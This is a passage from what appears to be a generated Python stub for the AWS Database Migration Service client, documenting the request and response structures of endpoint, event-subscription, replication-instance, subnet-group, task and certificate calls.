'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
}
}
**Response Structure**
- *(dict) --*
- **Endpoint** *(dict) --*
The endpoint that was deleted.
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with a cross-account.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads. But as the number of row groups grows, the slower writes become. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To use GZIP, set this value to ``NONE`` (the default). To keep the files uncompressed, don't use this value.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis source endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch source endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:rtype: dict
:returns:
"""
pass
def delete_event_subscription(self, SubscriptionName: str) -> Dict:
"""
Deletes an AWS DMS event subscription.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteEventSubscription>`_
**Request Syntax**
::
response = client.delete_event_subscription(
SubscriptionName='string'
)
**Response Syntax**
::
{
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
}
}
**Response Structure**
- *(dict) --*
- **EventSubscription** *(dict) --*
The event subscription that was deleted.
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A lists of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName: **[REQUIRED]**
The name of the DMS event notification subscription to be deleted.
:rtype: dict
:returns:
"""
pass
def delete_replication_instance(self, ReplicationInstanceArn: str) -> Dict:
"""
Deletes the specified replication instance.
.. note::
You must delete any migration tasks that are associated with the replication instance before you can delete it.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteReplicationInstance>`_
**Request Syntax**
::
response = client.delete_replication_instance(
ReplicationInstanceArn='string'
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The replication instance that was deleted.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
The public IP address of the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
The private IP address of the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance to be deleted.
:rtype: dict
:returns:
"""
pass
def delete_replication_subnet_group(self, ReplicationSubnetGroupIdentifier: str) -> Dict:
"""
Deletes a subnet group.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteReplicationSubnetGroup>`_
**Request Syntax**
::
response = client.delete_replication_subnet_group(
ReplicationSubnetGroupIdentifier='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier: **[REQUIRED]**
The subnet group name of the replication instance.
:rtype: dict
:returns:
"""
pass
def delete_replication_task(self, ReplicationTaskArn: str) -> Dict:
"""
Deletes the specified replication task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteReplicationTask>`_
**Request Syntax**
::
response = client.delete_replication_task(
ReplicationTaskArn='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The deleted replication task.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task to be deleted.
:rtype: dict
:returns:
"""
pass
def describe_account_attributes(self) -> Dict:
"""
Lists all of the AWS DMS attributes for a customer account. The attributes include AWS DMS quotas for the account, such as the number of replication instances allowed. The description for a quota includes the quota name, current usage toward that quota, and the quota's maximum value.
This command does not take any parameters.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeAccountAttributes>`_
**Request Syntax**
::
response = client.describe_account_attributes()
**Response Syntax**
::
{
'AccountQuotas': [
{
'AccountQuotaName': 'string',
'Used': 123,
'Max': 123
},
]
}
**Response Structure**
- *(dict) --*
- **AccountQuotas** *(list) --*
Account quota information.
- *(dict) --*
Describes a quota for an AWS account, for example, the number of replication instances allowed.
- **AccountQuotaName** *(string) --*
The name of the AWS DMS quota for this AWS account.
- **Used** *(integer) --*
The amount currently used toward the quota maximum.
- **Max** *(integer) --*
The maximum allowed value for the quota.
:rtype: dict
:returns:
"""
pass
def describe_certificates(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Provides a description of the certificate.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeCertificates>`_
**Request Syntax**
::
response = client.describe_certificates(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Certificates': [
{
'CertificateIdentifier': 'string',
'CertificateCreationDate': datetime(2015, 1, 1),
'CertificatePem': 'string',
'CertificateWallet': b'bytes',
'CertificateArn': 'string',
'CertificateOwner': 'string',
'ValidFromDate': datetime(2015, 1, 1),
'ValidToDate': datetime(2015, 1, 1),
'SigningAlgorithm': 'string',
'KeyLength': 123
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
The pagination token.
- **Certificates** *(list) --*
The Secure Sockets Layer (SSL) certificates associated with the replication instance.
- *(dict) --*
The SSL certificate that can be used to encrypt connections between the endpoints and the replication instance.
- **CertificateIdentifier** *(string) --*
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
- **CertificateCreationDate** *(datetime) --*
The date that the certificate was created.
- **CertificatePem** *(string) --*
The contents of the .pem X.509 certificate file for the certificate.
- **CertificateWallet** *(bytes) --*
The location of the imported Oracle Wallet certificate for use with SSL.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) for the certificate.
- **CertificateOwner** *(string) --*
The owner of the certificate.
